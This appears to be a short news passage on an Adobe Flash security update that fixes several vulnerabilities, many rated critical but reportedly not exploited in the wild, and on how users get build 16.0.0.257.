Adobe said none of the vulnerabilities, despite more than half of them being branded critical, are being exploited in the wild. Adobe is encouraging users to update to the most recent build of Flash, 16.0.0.257. While users who have Flash installed via Internet Explorer and Chrome will be automatically updated to the latest version, other users who run a desktop version will want to update via Adobe’s mechanism when it pops up.

Source